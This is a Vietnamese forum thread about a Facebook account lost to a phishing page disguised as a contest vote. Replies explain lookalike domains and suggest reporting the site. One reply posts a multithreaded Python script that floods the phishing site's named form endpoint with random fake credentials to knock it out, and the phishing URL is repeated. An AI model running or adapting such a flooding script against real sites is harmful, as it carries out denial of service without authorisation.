Mình bị hack tài khoản fb khi click vào đường link
https://trangchubinhchonthisinhmabanyeuthichnhat.weebly.com/?fbcclid=[KEYCODE]
Bà con có cách nào lấy lại được không?
Mình bị hack tài khoản fb khi click vào đường link
https://trangchubinhchonthisinhmabanyeuthichnhat.weebly.com/?fbcclid=[KEYCODE]
Bà con có cách nào lấy lại được không?
=]]]]z ngáo thiệt =]]]z
Người ta bảo nhập là nhập à =]]]z
Nó đổi mật khẩu/thông tin khôi phục thì đi tong luôn rồi
Rút kinh nghiệm nhé. Chỉ đăng nhập khi biết chắc chắn đó là trang chính thức (Facebook, Google, Twitter…). Không có chuyện 1 trang không phải chính thức có thể dùng tài khoản chính thức đăng nhập được.
Lúc trước từng có trang giả mạo, giao diện y như Facebook thật yêu cầu thông tin đăng nhập, nhờ thế bao nhiêu người mất tài khoản.
Unikey cũng từng bị giả mạo, chỉ thay địa chỉ unikey bằng unjkey (i -> j), khối người hốt virus về “xài”.
Khi duyệt web bạn nên chú ý đến thanh địa chỉ, chỉ 1 kí tự thay đổi có thể gây nguy cho người duyệt web rồi. facebook -> fadebook, facabook, faceb00k…
Thường được gửi dạng liên kết có sẵn, mặc dù hiển thị là trang A nhưng thực sự dẫn đến trang B giả mạo.
Mà thế này không gọi là “hack” đâu nhé, phải nói là: “TỰ CHUI ĐẦU VÀO RỌ”
Check thử thấy không có virus nên mạo hiểm vào thử xem sao…
2018 mà vẫn có người bị lừa bởi giao diện này à…
Dù sao thì nội dung web cũng nhắm tới dân không rành internet. Bác nào report trang này cho host để cho nó sập được không nhỉ?
Mình report cho C50 rồi, sợ nhiều tố giác quá người ta đọc không hết
Giống mấy người anh em trên garena thông báo của tôi quá. Mà tính ra hằng ngày bọn này cũng lừa được cả ngàn cái nick chứ đừng đùa. Nó lấy nick xong share trang của nó trên nick, lan với tốc độ chóng mặt.
Bạn nó nhờ click ủng hộ cho con em nó thi the voice kid, nên chủ quan không để ý, và rồi cái kết …
Cái ô đăng nhập lộ liễu thế mà cũng dính được
Social Engineering ợ.
Nếu bình thường thì ít ai để ý lắm @qloved à! Bây giờ mình bị gọi liên tục vì nó lấy fb nhờ nạp thẻ cào nè.
Code python này mình viết riêng để dos api của site này.
import string
import multiprocessing
import json
import requests
def call_api(data, url, method, timeout=3):
headers = {
'content-type': "application/x-www-form-urlencoded",
'cache-control': "no-cache",
'postman-token': "6a410524-a8e2-79c7-bd9d-53e4b68c84c7"
}
response = requests.request(method, url, data=data, headers=headers, timeout=timeout)
return response.status_code
import random
domains = ["hotmail.com", "gmail.com", "yahoo.com"]
letters = string.ascii_lowercase
def get_random_domain(domains):
return random.choice(domains)
def get_random_name(letters, length):
return ''.join(random.choice(letters) for i in range(length))
def generate_random_emails(length):
return get_random_name(letters, length) + '@' + get_random_domain(domains)
def generate_random_fbuid():
s = ''
for i in range(18):
s += str(random.randint(0, 9))
return s
def worker(name):
print("Start thread " + name)
while True:
email = generate_random_emails(random.randint(7, 20))
password = get_random_name(letters, random.randint(6, 20))
data = {'_u670129144241957701': email, '_u627346924137945252': password, 'form_version': 2,
'wsite_approved': 'approved', 'ucfid': '745490546360063774'}
res = call_api(data, 'https://trangchubinhchonthisinhmabanyeuthichnhat.weebly.com/ajax/apps/formSubmitAjax.php',
'POST')
if res != 200:
print('Can not POST!')
else:
print("===> " + name + ": " + json.dumps(data))
import threading
for i in range(multiprocessing.cpu_count() - 1):
t = threading.Thread(target=worker, args=("Thread " + str(i + 1),))
t.start()
lên online.gov.vn report trang web đó. Đó là trang lừa đảo đó